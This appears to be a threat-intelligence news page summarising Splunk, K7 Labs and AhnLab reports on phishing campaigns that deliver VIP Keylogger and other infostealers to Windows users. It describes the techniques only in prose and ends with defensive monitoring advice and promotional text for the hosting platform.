Researchers reported active phishing operations using business-document lures and fake "secure mail" messages to infect Windows users with VIP Keylogger and related infostealers. Splunk said attackers sent payment notices, procurement orders, and logistics updates carrying heavily obfuscated .vbs, .js, or .bat loaders that launched PowerShell stagers, hid data in environment variables, and used steganography in PNG files to rebuild the final payload. K7 Labs also tracked a malware-as-a-service VIP_Keylogger campaign, while Splunk said the malware injects into aspnet_compiler.exe and steals keystrokes, screenshots, browser and Outlook credentials, clipboard contents, and cryptocurrency wallet addresses before exfiltrating data to attacker infrastructure, including Telegram.
AhnLab separately detailed a South Korea-focused campaign impersonating a major credit card company with malicious LNK files that executed PowerShell and mshta, fetched an HTA with obfuscated VBScript, and displayed decoy documents to reduce suspicion. The malware changed behavior depending on whether Windows Defender was enabled: one path delivered AES-encrypted archives with backdoor, keylogging, clipboard theft, and information-stealing components, while the other used rundll32 to load a downloader that avoided VBox and VMware and then pulled additional payloads from Google Drive to steal browser, email, cookie, clipboard, and cryptocurrency wallet data. Defenders were urged to scrutinize email attachments and file types, monitor suspicious registry and PowerShell activity, and watch for script-launched processes and Telegram-related DNS traffic.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
4 events from the most recent confirmed update back to the earliest known activity.
Splunk Threat Research Team analyzed an active VIP Keylogger phishing campaign and reviewed more than 200 loader samples observed from March to April 2026. The campaign used business-themed phishing lures and obfuscated script loaders to infect Windows users and steal credentials and other data.
Cyber Security News reported Splunk's findings on an active VIP Keylogger phishing campaign that used business-document lures, steganography, and PowerShell-based loaders. The report also highlighted data theft capabilities and exfiltration to command-and-control infrastructure including Telegram.
AhnLab disclosed a malware campaign distributing malicious files disguised as secure emails from a major Korean credit card company. The campaign used LNK files to launch mshta and PowerShell, then conditionally delivered different payload chains depending on whether Windows Defender was enabled.
K7 Labs published a report on a malware-as-a-service campaign involving VIP Keylogger. The reference establishes public reporting on the campaign by March 6, 2026.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
4 references tracked. Mallory keeps watching after this page renders.
cybersecuritynews.com
Open sourceasec.ahnlab.com
Open sourceasec.ahnlab.com
Open sourcelabs.k7computing.com
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.